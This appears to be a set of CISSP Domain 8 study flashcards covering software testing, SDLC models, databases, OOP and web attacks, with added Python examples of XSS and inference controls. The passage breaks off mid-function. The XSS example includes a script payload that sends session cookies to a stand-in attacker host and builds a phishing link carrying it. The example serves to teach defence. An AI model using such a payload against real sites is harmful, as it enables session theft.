CISSP - Domain 8. Software Development Security


1. Black box testing - Best form of testing
2. White box testing
3. Dynamic Testing
4. Static Testing
5. Manual Testing
6. Automated Testing

1. No internal code details are used - Evaluation of input and output. The tester doesn't have access to the code and its implementation.
2. Internal code details are shared/considered. The tester has full access to the internal code.
3. The system/software is executed and its behavior is observed.
4. Examining source code without executing the system/software.
5. Test guided by a human.
6. Test is performed by an application.

1. Development phase
2. Testing of the completed product, and also in the Operations phase
3. Planning and Design phase
4. Operations phase

1. Static Source Code Review and Manual Code Review are performed in which phase of the SDLC?
2. Penetration Testing, Vulnerability Scanning and Fuzz Testing are performed in which phase of the SDLC?
3. Threat Modeling is performed in which phase of the SDLC?
4. Passive Testing (Monitoring, IDS) should be performed in which phase?

10. D. iv. The following are correct characteristics of the ACID test:
• Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back.
• Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
• Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
• Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.

10. Databases can record transactions in real time, which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what's known as the ACID test. Which of the following are incorrect characteristics of the ACID test? i. Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. ii. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. iii. Isolation Transactions execute in isolation until completed, without interacting with other transactions. iv. Durability Once the transaction is verified as inaccurate on all systems, it is committed and the databases cannot be rolled back.

11. B. The following outlines the common phases of the software development life cycle: i. Requirements gathering ii. Design iii. Development iv. Testing v. Operations and maintenance

11. The software development life cycle has several phases. Which of the following lists these phases in the correct order? A. Requirements gathering, design, development, maintenance, testing, release B. Requirements gathering, design, development, testing, operations and maintenance C. Prototyping, build and fix, increment, test, maintenance D. Prototyping, testing, requirements gathering, integration, testing

12. D. i, ii, iii, iv. There are different types of tests the software should go through because there are different potential flaws we will be looking for. The following are some of the most common testing approaches:
• Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions
• Integration testing Verifying that components work together as outlined in design specifications
• Acceptance testing Ensuring that the code meets customer requirements
• Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection

12. John is a manager of the application development department within his company. He needs to make sure his team is carrying out all of the correct testing types and at the right times of the development stages. Which of the following accurately describe types of software testing that should be carried out? i. Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions. ii. Integration testing Verifying that components work together as outlined in design specifications. iii. Acceptance testing Ensuring that the code meets customer requirements. iv. Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection.

13. B. Garbage collection is an automated way for software to carry out part of its memory management tasks. A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks. It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

13. Tim is a software developer for a financial institution. He develops middleware software code that carries out his company's business logic functions. One of the applications he works with is written in the C programming language and seems to be taking up too much memory as it runs over time. Which of the following best describes what Tim should implement to rid this software of this type of problem? A. Bounds checking B. Garbage collector C. Parameter checking D. Compiling

14. A. The listed software development methodologies and their definitions are as follows:
• Joint Analysis Development (JAD) A methodology that uses a team approach in application development in a workshop-oriented environment.
• Rapid Application Development (RAD) A methodology that combines the use of prototyping and iterative development procedures with the goal of accelerating the software development process.
• Reuse methodology A methodology that approaches software development by using progressively developed code. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse methodology does not require programs to be built from scratch, it drastically reduces both development cost and time.
• Cleanroom An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

14. Marge has to choose a software development methodology that her team should follow. The application that her team is responsible for developing is a critical application that can have few to no errors. Which of the following best describes the type of methodology her team should follow? A. Cleanroom B. Joint Analysis Development (JAD) C. Rapid Application Development (RAD) D. Reuse methodology

15. C. Fuzz testing, or fuzzing, is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

15. __________ is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. A. Agile testing B. Structured testing C. Fuzzing D. EICAR

16. A. The five levels of the Capability Maturity Model Integration are:
• Initial Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. Success is usually the result of individual heroics.
• Repeatable A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined.
• Defined Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement.
• Managed The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process-improvement program.
• Optimizing The company has budgeted and integrated plans for continuous process improvement.

16. Which of the following is the second level of the Capability Maturity Model Integration? A. Repeatable B. Defined C. Managed D. Optimizing

17. B. The characteristics and their associated definitions are listed as follows:
• Modularity Autonomous objects, cooperation through exchanges of messages.
• Deferred commitment The internal components of an object can be redefined without changing other parts of the system.
• Reusability Refining classes through inheritance. Other programs using the same objects.
• Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.

17. One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic? A. The building blocks of software are autonomous objects, cooperating through the exchange of messages. B. The internal components of an object can be redefined without changing other parts of the system. C. Classes are reused by other programs, though they may be refined through inheritance. D. Object-oriented analysis, design, and modeling map to business needs and solutions.

18. D. The buffer overflow is probably the most notorious of input validation mistakes. A buffer is an area reserved by an application to store something in it, such as some user input. After the application receives the input, an instruction pointer points the application to do something with the input that's been put in the buffer. A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that tells the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

18. Which of the following attack types best describes what commonly takes place when you insert specially crafted and excessively long data into an input field? A. Traversal attack B. Unicode encoding attack C. URL encoding attack D. Buffer overflow attack

19. A. The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on "normal" pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

19. Which of the following has an incorrect attack-to-definition mapping? A. EBJ XSS attack Content processing stages performed by the client, typically in client-side Java. B. Nonpersistent XSS attack Improper sanitation of response from a web client. C. Persistent XSS attack Data provided by attackers is saved on the server. D. DOM-based XSS attack Content processing stages performed by the client, typically in client-side JavaScript.

2. A. DevOps is a type of integrated product team (IPT) that focuses on three communities: software development, IT operations, and quality assurance. The idea is to reduce the friction that oftentimes exists between the developers and IT staff in order to improve quality and velocity.

2. Which of the following best describes the term DevOps? A. The practice of incorporating development, IT, and quality assurance (QA) staff into software development projects. B. A multidisciplinary development team with representatives from many or all the stakeholder populations. C. The operationalization of software development activities to support just-in-time delivery. D. A software development methodology that relies more on the use of operational prototypes than on extensive upfront planning.

20. B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

20. John is reviewing database products. He needs a product that can manipulate a standard set of data for his company's business logic needs. Which of the following should the necessary product implement? A. Relational database B. Object-relational database C. Network database D. Dynamic-static

21. A. The following are correct characteristics of ADO:
• It's a high-level data access programming interface to an underlying data access technology (such as OLE DB).
• It's a set of COM objects for accessing data sources, not just database access.
• It allows a developer to write programs that access data without knowing how the database is implemented.
• SQL commands are not required to access a database when using ADO.

21. ActiveX Data Objects (ADO) is an API that allows applications to access back-end database systems. It is a set of ODBC interfaces that exposes the functionality of data sources through accessible objects. Which of the following are incorrect characteristics of ADO? i. It's a low-level data access programming interface to an underlying data access technology (such as OLE DB). ii. It's a set of COM objects for accessing data sources, not just database access. iii. It allows a developer to write programs that access data without knowing how the database is implemented. iv. SQL commands are required to access a database when using ADO.

24. B. Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

24. Which of the following is the best technology for Sandy's team to implement as it pertains to the previous scenario? A. Computer-aided software engineering tools B. Software configuration management C. Software development life-cycle management D. Software engineering best practices

25. D. A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

25. Which is the best software architecture that Sandy should introduce her team to for effective business application use? A. Distributed component object architecture B. Simple Object Access Protocol architecture C. Enterprise JavaBeans architecture D. Service-oriented architecture

26. D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

26. Which best describes the approach Sandy's team member took when creating the business-oriented software package mentioned within the scenario? A. Software as a Service B. Cloud computing C. Web services D. Mashup

29. A. Client-side validation is being carried out. This procedure ensures that the data that is inserted into the form contains valid values before being sent to the web server for processing. The web server should not just rely upon client-side validation, but should also carry out a second set of procedures to ensure that the input values are not illegal and potentially malicious.

29. Which of the following functions is the web server software currently carrying out, and what is an associated security concern Brad should address? A. Client-side validation The web server should carry out a secondary set of input validation rules on the presented data before processing it. B. Server-side includes validation The web server should carry out a secondary set of input validation rules on the presented data before processing it. C. Data Source Name logical naming access The web server should be carrying out a second set of reference integrity rules. D. Data Source Name logical naming access The web server should carry out a secondary set of input validation rules on the presented data before processing it.

3. D. Some files cannot be properly sanitized by the antivirus software without destroying them or affecting their functionality. So, the administrator must replace such a file with a known uninfected file. Plus, the administrator needs to make sure he has the patched version of the file, or else he could be introducing other problems. Answer C is not the best answer because the administrator may not know the file was clean yesterday, so just restoring yesterday's file may put him right back in the same boat.

3. A system has been patched many times and has recently become infected with a dangerous virus. If antimalware software indicates that disinfecting a file may damage it, what is the correct action? A. Disinfect the file and contact the vendor B. Back up the data and disinfect the file C. Replace the file with the file saved the day before D. Restore an uninfected version of the patched file from backup media

30. B. The current architecture allows for web server software to directly communicate with a back-end database. Brad should ensure that proper database access authentication is taking place so that SQL injection attacks cannot be carried out. In a SQL injection attack the attacker sends over input values that the database carries out as commands and can allow authentication to be successfully bypassed.

30. Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with? A. Parameter validation attack B. Injection attack C. Cross-site scripting D. Database connector attack

4. B. Instantiation is what happens when an object is created from a class. Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons. The example given in the chapter was a way to use polyinstantiation for security purposes to ensure that a lower-level subject could not access an object at a higher level.

4. What is the purpose of polyinstantiation? A. To restrict lower-level subjects from accessing low-level information B. To make a copy of an object and modify the attributes of the second copy C. To create different objects that will react in different ways to the same input D. To create different objects that will take on inheritance attributes from their class

5. C. A database view is put into place to prevent certain users from viewing specific data. This is a preventive measure, because the administrator is preventing the users from seeing data not meant for them. This is one control to prevent inference attacks.

5. Database views provide what type of security control? A. Detective B. Corrective C. Preventive D. Administrative

7. A. The trick to this question, and any one like it, is that security should be implemented at the first possible phase of a project. Requirements are gathered and developed at the beginning of a project, which is project initiation. The other answers are steps that follow this phase, and security should be integrated right from the beginning instead of in the middle or at the end.

7. When should security first be addressed in a project? A. During requirements development B. During integration testing C. During design specifications D. During implementation

8. C. This can seem like a tricky question. It states that the system has detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and, if so, investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

8. An online transaction processing (OLTP) system that detects an invalid transaction should do which of the following? A. Roll back and rewrite over original data B. Terminate all transactions until properly addressed C. Write a report to be reviewed D. Checkpoint each data entry

9. D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

9. Which of the following are rows and columns within relational databases? A. Rows and tuples B. Attributes and rows C. Keys and views D. Tuples and attributes

Project, Program and Portfolio

A project is a temporary endeavor, with a finite start and end, that is focused on creating a unique product, service or result. A program is a collection of projects. Like a project, a program is temporary: when all of its projects complete, the program is marked complete. A portfolio is a collection of projects and programs.

Database Denormalization

Adding extra information to the tables for performance or security.
- Redundant information to enhance performance
- Incorrect information in the tables as a countermeasure against inference attacks

This software development model is an iterative and incremental process that emphasizes time-boxed, team-based collaboration.

Agile Methodology (Refer 59.1. SDLC)

DevOps

An approach based on lean and agile principles in which business owners and the development, operations, and quality assurance departments collaborate. In other words, it is a software development and delivery process that emphasizes communication and collaboration between product management, software development and operations professionals across the entire service lifecycle.

- Initial - Process is unpredictable
- Managed - Process is characterized for projects and is reactive
- Defined - Process is characterized for the organization and is proactive
- Quantitatively Managed - Process is measured and controlled
- Optimized - Focus on process improvement

CMMI is a later version of CMM.

Database Schema

It is the skeleton structure that represents the logical view of the entire database. It defines how the data is organized and how the relations among them are associated. It formulates all the constraints that are to be applied to the data. It is the blueprint of the database structure.

Message - How objects communicate in order to operate.
Method - A function or action an object can carry out.
Behavior - The results or output of an object upon receipt of a message (how it behaves).
Classes - Code containers of common methods that define the attributes and behavior of the objects created from them.
Objects - These are created, destroyed and manipulated.
Delegation - Forwarding of a request by an object.
Instance - A concrete example of a class, containing its methods.

Key Terminology for OOP

ISCM Workflow (Information Security Continuity Management)

Phases are:
- Define Program
- Establish Program
- Implement Program
- Report/Analyze Program
- Monitor Program
- Repeat

Configuration Management Workflow

Phases are:
- Research and Plan Baseline based on NIST publications
- Approve the Plan
- Implement & Deploy
- Control Changes
- Monitor
- Report

Change Management Workflow

Phases are:
- Submit Request
- Evaluate Request
- Test Request (Optional)
- Approve Request
- Document/Log Request
- Implement Request
- Verify Implementation
- Close Request

Integration Testing

The QA test team verifies that the components work together as outlined in the design specification. If they do not, the components go back to the developers for unit testing.

Unit Testing

Testing of individual modules. Individual components are tested in a controlled environment where programmers validate data structure, logic and boundary conditions. This test is generally carried out by the development team.

SSE-CMM
- Initial: Ad hoc/Terrible
- Repeatable: Still reactive; change control is in place but a formal process is not defined.
- Well Defined: Proactive, with defined processes in place.
- Managed: Quantitative data is collected and analyzed. A process improvement program is used.
- Optimized: A continuous process improvement process is in place and budgeted.

The only CMM developed specifically to address security in addition to maturity.

Interface Testing

This is the evaluation of how systems or components exchange data and control.

Acceptance Testing

This test is carried out by the team to ensure that the code meets the written requirements.

Tracks files, source code and configurations over time.

Version Control (Refer 59.1. SDLC)

Software Development Methodologies: Waterfall

Waterfall - Very linear; each phase leads directly into the next and there is no going back. There's a lack of flexibility with this approach. The Sashimi model is like Waterfall, but you can traverse back and forth between the phases.

It is a linear software development model that requires each phase to be completed before moving on to the next phase.

Waterfall Model (Refer 59.1. SDLC)

Different software development models

- Waterfall Model
- V-Model
- Sashimi Model (like Waterfall, but traverses both ways)
- Spiral Model
- Cleanroom Model
- Agile
- RAD
(Refer 59.1. SDLC)

1. Better Schedule Management 2. Better quality management and maintenance 3. Reduction of the general defect rate in software.

What are the three important business goals of software development CMM?

Indexing

What is used to find records within a table more quickly?

Attack Surface Identification

What part of the security review process are the input parameters listed below used for? - Configuration Input Parameters - User Input Parameters - Control Input Parameters - Backend Input Parameters.

Waterfall Methodology Phases are:
1. Requirement Definition
2. System and Software Design
3. Implementation & Unit Testing (Logical Design)
4. Integration and System Testing
5. Document, Implement & Operational Maintenance
6. End of Life Retirement

This software development method is pervasive and based on "measure twice, cut once". It is most suited to big, long-term projects.

Polyinstantiation

To protect sensitive data such as top secret information, lower-level users receive a fake view of the data. In other words, false data is inserted and shown to users without a "need to know" who attempt to access the records. Put another way, it displays different results to different individuals who pose identical queries on identical databases, because those individuals possess different security levels.

Top Down vs Bottom Up Programming concept

Top Down - Starts with the big picture and breaks it down into smaller segments. Bottom Up - Piecing together systems to build more complex systems. The base elements of the system are first specified in great detail and then linked together to form a larger picture. OOP leans towards bottom-up programming. Note - These are not SDLC methodologies.

1. B. A Trojan horse looks like an innocent and helpful program, but in the background it is carrying out some type of malicious activity unknown to the user. The Trojan horse could be corrupting files, sending the user's password to an attacker, or attacking another computer.

1. An application is downloaded from the Internet to perform disk cleanup and to delete unnecessary temporary files. The application is also recording network login data and sending it to another party. This application is best described as which of the following? A. A virus B. A Trojan horse C. A worm D. A logic bomb

CSRF (Cross Site Request Forgery). This can be prevented by using a cryptographic token that the forged request cannot supply.

- It takes advantage of the trust that a web application has in the user's browser.
- The cookie and token of an existing trusted browser session are used to access a secure website and steal information.
- This is also called a One Click attack or session riding.

Programming Languages Generations

1st Generation - Machine code
2nd Generation - Assemblers
3rd Generation - COBOL, C, C++, Java, JavaScript etc.
4th Generation (4GL) - ColdFusion, Progress 4GL, SQL, PHP, Perl

6. A. Partitioning means to logically split the database into parts. Views then dictate which users can view specific parts. Cell suppression means that specific cells are not viewable by certain users. And noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.

6. Which of the following techniques or set of techniques is used to deter database inference attacks? A. Partitioning, cell suppression, and noise and perturbation B. Controlling access to the data dictionary C. Partitioning, cell suppression, and small query sets D. Partitioning, noise and perturbation, and small query sets

Interpreter; Bytecode

An interpreter is a computer program that directly executes instructions written in a programming or scripting language, without requiring them previously to have been compiled into a machine language program. A Bytecode is program code that has been compiled from source code into low-level code designed for a software interpreter.

Database - User defined Integrity

Business integrity, also called user integrity, ensures that the database enforces user-defined business rules, regulations, policies, and procedures. You usually enforce business integrity by using stored procedures and triggers.

Term used to describe a commonly used suite of development tools, such as diagramming aids, a library of standard function tools, version control tools and project management tools.

CASE (Computer Aided Software Engineering) (Refer 59.1. SDLC)

Phases of CMM

Capability Maturity Model
- Initial (Uncontrolled/Unpredictable)
- Managed (Project Oriented Management/Reactive)
- Defined (Project Oriented Basic Policies/Standards/Repeatable/Proactive)
- Quantitatively Managed (Processes are measured; metrics can be applied and controlled)
- Optimized (Focused on process improvement)
(Refer 59.1. SDLC)

It manages changes to artifacts, such as code changes or documentation changes.

Change Control (Refer 59.1. SDLC)

This is a software development model that needs strict certification and uses structured and formal methods of development and statistical quality control, with the goal of eliminating defects prior to release.

Cleanroom Approach (Refer 59.1. SDLC)

Spiral Development Model

Combines Waterfall and Prototyping with risk assessment.
- In each phase or quadrant, the associated risks are defined and analyzed.
- Each iteration is designed using the Waterfall model.

It is used to support the development baseline and standards.

Configuration Management (Refer 59.1. SDLC)

Database Shadowing

Database shadowing keeps an exact, real-time copy of the database (or its files) in another location by applying every change to the shadow as it happens on the live database. The shadow can sit on another disk in the same server, but best practice places it in a different geographic location, often on different media. It is normally held as a read-only copy and brought online only when the primary database is unavailable.

Database DDL & DML

DDL statements are used to create database, schema, constraints, users, tables etc. DML statement is used to insert, update or delete the records.

EU-US Privacy Shield

The seven Privacy Shield principles are: - Notice - Choice - Accountability for Onward Transfer - Security - Data Integrity and Purpose Limitation - Access - Recourse, Enforcement and Liability. (Note: the Court of Justice of the EU invalidated the Privacy Shield adequacy decision in July 2020 in the Schrems II judgment, so it no longer provides a lawful basis for EU-US transfers.)

Database - Semantic Integrity

Semantic integrity requires that every attribute value conforms to the structural and semantic rules defined for it: the correct data type, an allowed range or domain of values, and any uniqueness or logical-value rules.

Database - Entity Integrity

Entity integrity requires that every row in a table is uniquely identifiable: each table has a primary key, and the primary key value of every row is unique and not null. If a primary key is duplicated or left null, entity integrity is lost. For example, if every row in a table represents one real-world entity, the table needs one column or a set of columns that uniquely identifies each row; defining that key is what enforces entity integrity.

eVaulting

Electronic vaulting (e-vaulting): Using a remote backup service, backups are sent off-site electronically at a certain interval or when files change.

Database Normalization

Eliminate Duplicates. The process of organizing the fields and tables of a relational database to minimize redundancy and dependency.

Cleanroom Model

Focused on defect prevention rather than defect removal. - Get the software correct the first time. - Don't release a buggy program and then patch, patch and patch.

Freeware, Shareware , Crippleware & EULA

Freeware is free of charge. Shareware is proprietary software that is initially free to use, often as a trial to evaluate the software. Crippleware is partially functioning software that requires payment to enable full functionality. EULA - End User License Agreement.

NIST SP 800-128

Guide for Security-Focused Configuration Management of Information Systems. The CM plan is a comprehensive description of the roles, responsibilities, policies and procedures that apply when managing the configuration of products and systems. Basic parts of a CM plan include: - Configuration Control Board (CCB) - Configuration Item Identification - Configuration Change Control - Configuration Monitoring

Phases of SDLC

SDLC phases (this card references ISO/IEC 12207, the software life cycle processes standard): 1. Feasibility Study 2. Requirements Gathering 3. Design 4. Development/Build 5. Deployment/Implementation 6. Support/Operate (Refer 59.1. SDLC)

Abstraction

Ignoring detail while analyzing

Data Dictionary

It is a central repository of database metadata. It contains information about database views, administrators, user accounts, auditing and the database schema, and cross-references groups of data elements and how they relate to each other. It allows central management of the database.

Fagan's Inspection

It is a formal, structured software inspection process in which the author and a review team with defined roles (moderator, reader, reviewers) examine the code using a fixed procedure: planning, overview, preparation, inspection meeting, rework and follow-up, with every defect recorded and tracked to closure.

XSS (Cross Site Scripting)

Cross-site scripting is a web application attack in which the attacker injects script (usually JavaScript) into a page that other users view, so the script runs in the victim's browser in the context of the vulnerable site and can steal session cookies, read browser storage or act on the user's behalf. It is possible wherever untrusted input is echoed into the page as raw HTML instead of being encoded as HTML entities.

2. Non-persistent (reflected) XSS - The payload is not stored by the application; it is reflected straight back from a single request (for example a search parameter). The attacker must trick the victim into clicking a crafted link, so the individual user is the target.

In a reflected attack the attacker typically places the script in a parameter after the "?" of a vulnerable URL (for example after "search?"); it executes as soon as the victim opens the link in a browser that is logged in to the site. The crafted link is usually delivered by phishing, such as a fake parcel-tracking or "delivery pending" message.

OOP

Object Oriented Programming: "A method of programming which classifies real world objects into classes, data structures and encapsulates those objects attributes and behaviors."

Benefits and Flaws of Open Source vs Closed Source

Open source: the code is released publicly, so it can be reviewed, tested and corrected by anyone, but attackers can also study it to find flaws. Closed source: the source code is kept secret, which may be good business practice but relies on security through obscurity; the flaws are still there, just harder for outsiders to find.

Operational Acceptance Testing

Operational acceptance testing: is the software, and every component it interacts with, ready to be operated in production? It is performed by system administrators/operations staff: - Are backups in place? - Do we have a DR plan? - How do we handle patching? - Has it been checked for vulnerabilities? Etc.

Hierarchical Databases

Organizes data using a tree-like or organizational chart type structure (the child can only have one parent). Windows Registry is an example of a hierarchical database.

Software Licenses

Permissive. Permissive licenses are also known as "Apache style" or "BSD style." They contain minimal requirements about how the software can be modified or redistributed. This type of software license is perhaps the most popular license used with free and open source software. Aside from the Apache License and the BSD License, another common variant is the MIT License. LGPL. The GNU Lesser General Public License allows you to link to open source libraries in your software. If you simply compile or link an LGPL-licensed library with your own code, you can release your application under any license you want, even a proprietary license. But if you modify the library or copy parts of it into your code, you'll have to release your application under similar terms as the LGPL.

Digital Forensic Process

Processes are: - Evidence Collection - Acquisition - Examination - Analyze - Report - Testify - Archive

High cohesion and Low coupling.

Programmers should strive to develop modules that have ----- cohesion and ---- coupling. Cohesion addresses the fact that a module can perform a single task with low input from other modules. Coupling is the measurement of the amount of interconnections or dependencies between modules. Low coupling means that a change to one module should not affect another and the module has high cohesion.

This approach sets the scope, boundaries, defines guidelines, performs coordination and deliverables

Project Management. The project manager provides day-to-day facilitation and coordination. (Refer 59.1. SDLC)

It deploys (makes available) versions to various resources for simultaneous development.

Provisioning (Refer 59.1. SDLC)

This iterative software development model combines rapid prototyping with short development cycles and heavy user involvement.

RAD Methodology (Refer 59.1. SDLC)

Full and Partial Disclosures. (Question in Domain 8)

Responsible (partial) disclosure: tell the vendor first and give them time to develop a patch, then disclose. If the vendor does nothing, the researcher can fall back to full disclosure (publishing the details publicly) to force them to act.

Risk Management Framework

Risk Management Framework (NIST SP 800-37) steps: - Categorize the system and its information - Select appropriate controls - Implement controls - Assess controls - Authorize the system to operate - Monitor controls. (Revision 2 adds a preliminary Prepare step.)

SCRUM - A framework for managing software development. Scrum is designed for small teams (roughly ten people or fewer) and works in short, fixed-length development cycles called sprints, commonly two weeks.

SCRUM Core Roles of Scrum Framework are: - Product Owner - Represents stakeholders and customer. - Development Team - Scrum Master - To ensure framework is followed and removes the roadblock.

Source Code Escrow

Source code escrow is used to obtain the right to maintain and modify software if the vendor goes out of business or stops supporting it. The source code is deposited with a third-party escrow agent and released to the licensee if the licensor files for bankruptcy or otherwise fails to maintain and update the software as promised in the license agreement.

This software development model is iterative approach that emphasizes risk analysis and user feedback.

Spiral Model (Refer 59.1. SDLC)

Document Oriented Database

Stores unstructured data, such as the text of a speech or newspaper article. A document-oriented database, or document store, is a computer program designed for storing, retrieving and managing document-oriented information. XML databases are a subclass of document-oriented databases that are optimized to work with XML documents.

Polymorphism

Technically this means that one thing can take on many forms: the same message or method call produces different behaviour depending on the object that receives it. - One input, but different outputs because of the different classes or methods behind it. - How different objects respond to the same command.

Cardinality & Degree of the table.

What term is used for the number of rows (tuples) in a table? What term is used for the number of columns (attributes) in a table?

Database - Referential Integrity

Every foreign key value in a secondary (child) table must match an existing primary key value in the referenced (parent) table, or be null. Referential integrity is broken when a foreign key points to a primary key value that does not exist in the parent table (an orphaned row).

1. Persistent (Stored) XSS -

The payload is saved by the application (in a comment, post, profile field or similar) and served to every user who views that content, so it keeps executing until the application fixes its output handling (HTML-entity encoding, escaping or contextual output encoding). Many users are targets at once, and the victim cannot protect themselves by their own action.
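The two XSS variants on this card and on the "XSS (Cross Site Scripting)" card, shown as an added Python example that is not part of the original page. It uses a constructed in-memory comment list in place of the application's database and placeholder hosts (shop.example, attacker.example); the vulnerable functions interpolate user input into HTML directly, the safe ones encode it with html.escape first.

```python
import html
from urllib.parse import urlencode

# Constructed in-memory "comments" table standing in for the application's database (assumption).
COMMENTS = []

# Constructed attacker payload; attacker.example and shop.example are placeholder hosts.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def post_comment(text):
    """Stored XSS step 1: the application saves user input verbatim."""
    COMMENTS.append(text)


def render_comments_vulnerable():
    """Stored XSS step 2: raw interpolation, so every later visitor's browser runs the payload."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def render_comments_safe():
    """Fix: HTML-entity-encode on output, so '<' becomes '&lt;' and is displayed, not executed."""
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in COMMENTS) + "</ul>"


def search_page_vulnerable(q):
    """Reflected XSS: the query parameter is echoed straight back into the page."""
    return f"<p>Results for: {q}</p>"


def search_page_safe(q):
    """Fix: encode before reflecting; quote=True also encodes quotes, needed inside attributes."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def attacker_link():
    """The pre-made link the attacker phishes to the victim; the payload rides after the '?'."""
    return "https://shop.example/search?" + urlencode({"q": PAYLOAD})


def contains_script(markup):
    """Crude check used by demo(): does the rendered HTML still contain a live <script> tag?"""
    return "<script" in markup.lower()


def demo():
    """Exercise both variants of both XSS types; True means the payload survived into the page."""
    COMMENTS.clear()
    post_comment(PAYLOAD)
    return {
        "stored_vulnerable": contains_script(render_comments_vulnerable()),
        "stored_safe": contains_script(render_comments_safe()),
        "reflected_vulnerable": contains_script(search_page_vulnerable(PAYLOAD)),
        "reflected_safe": contains_script(search_page_safe(PAYLOAD)),
        "link": attacker_link(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The safe functions escape at output time, not at input time: the same stored comment may later be placed in an HTML attribute, a JavaScript string or a URL, and each context needs its own encoding, so encoding once on the way into the database is not enough.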

Aggregation

The process of combining several low-sensitivity items, and drawing medium- or high-sensitivity conclusions.

Inference

The process of deducing privileged information from available unprivileged sources.
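An added Python example (not from the original page) for this card and for question 6 above on deterring inference attacks. It uses a constructed employee table in which one person is the only member of her department. Against a naive statistical interface the attacker learns her exact salary by differencing two aggregate queries; the restricted interface applies a minimum query-set size (cell suppression, also checked on the complement of the query) and optional bounded noise (perturbation).

```python
import random

# Constructed employee table (assumption: not from the page). "grace" is the only member of "sec",
# which is exactly the situation an inference attack exploits.
EMPLOYEES = [
    {"name": "alice", "dept": "eng", "salary": 120_000},
    {"name": "bob",   "dept": "eng", "salary": 110_000},
    {"name": "carol", "dept": "eng", "salary": 105_000},
    {"name": "dave",  "dept": "ops", "salary": 90_000},
    {"name": "erin",  "dept": "ops", "salary": 95_000},
    {"name": "frank", "dept": "ops", "salary": 85_000},
    {"name": "grace", "dept": "sec", "salary": 130_000},
]

MIN_QUERY_SET = 3   # smallest group a statistical query may describe (cell suppression)


class QueryRejected(Exception):
    """Raised when a query would describe too few people to hide any individual."""


def unrestricted_sum(predicate):
    """Naive statistical interface: answers a SUM over any subset, however small."""
    return sum(r["salary"] for r in EMPLOYEES if predicate(r))


def restricted_sum(predicate, noise_scale=0, rng=None):
    """Same query with two inference controls: a minimum query-set size and optional additive noise.

    The complement of the query set is checked too; otherwise the attacker differences
    'everyone' against 'everyone except X' and isolates X anyway. A query covering the whole
    table (complement of 0) singles nobody out and is allowed.
    """
    matched = sum(1 for r in EMPLOYEES if predicate(r))
    complement = len(EMPLOYEES) - matched
    if matched < MIN_QUERY_SET or 0 < complement < MIN_QUERY_SET:
        raise QueryRejected(f"query set of {matched} rows is too small or too close to the whole table")
    exact = unrestricted_sum(predicate)
    if noise_scale:
        # Perturbation: bounded uniform noise keeps the answer statistically useful but inexact.
        rng = rng or random
        return exact + rng.uniform(-noise_scale, noise_scale)
    return exact


def infer_single_salary_unrestricted():
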